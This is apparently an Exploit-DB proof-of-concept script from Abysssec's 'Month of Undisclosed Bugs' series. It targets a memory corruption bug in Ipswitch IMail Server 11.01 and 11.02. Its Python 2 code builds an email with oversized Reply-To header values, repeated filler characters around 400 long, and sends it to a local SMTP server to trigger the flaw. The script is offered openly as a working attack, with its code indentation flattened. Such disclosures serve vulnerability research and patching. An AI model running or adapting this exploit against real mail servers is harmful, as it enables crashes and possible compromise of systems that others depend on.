Month Of Abysssec Undisclosed Bugs - Ipswitch Imail Server

`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/  
  
'''  
  
'''  
Title : Ipswitch Imail Server List Mailer Reply-To Address memory corruption  
Version : Imail server v11.01 and 11.02  
Analysis : http://www.abysssec.com  
Vendor : http://www.ipswitch.com  
Impact : Critical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
  
'''  
  
import smtplib  
  
sender = '[email protected]'  
receivers = ['CrashList@wapteam-f556693']  
  
message = """From: From Person <[email protected]>  
To: To Person <CrashList@wapteam-f556693>  
"""  
#ReplayCount = 5  
#while ReplayCount>0:  
# message = message + "Reply-To:"  
counter = 3  
while counter>0:  
# if counter != 50000 :  
# message = message + ","  
#message = message + "Reply-To: <someone"+str(counter)+"@example.org>"  
message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"  
counter = counter - 1  
message = message + "\n"  
# ReplayCount = ReplayCount - 1  
  
#message = message + "\n"  
message = message + """  
Subject: SMTP e-mail test  
  
This is a test e-mail message.  
  
"""  
#print message   
#fp = open("C:\\Program Files\\Ipswitch\\IMail\\spool\\tmp188.tmp","w")  
#fp.write(message)  
#fp.close()  
#print "wrote"  
try:  
smtpObj = smtplib.SMTP('localhost')  
smtpObj.sendmail(sender, receivers, message)   
print "Successfully sent email"  
except SMTPException:  
print "Error: unable to send email"  
  
  
`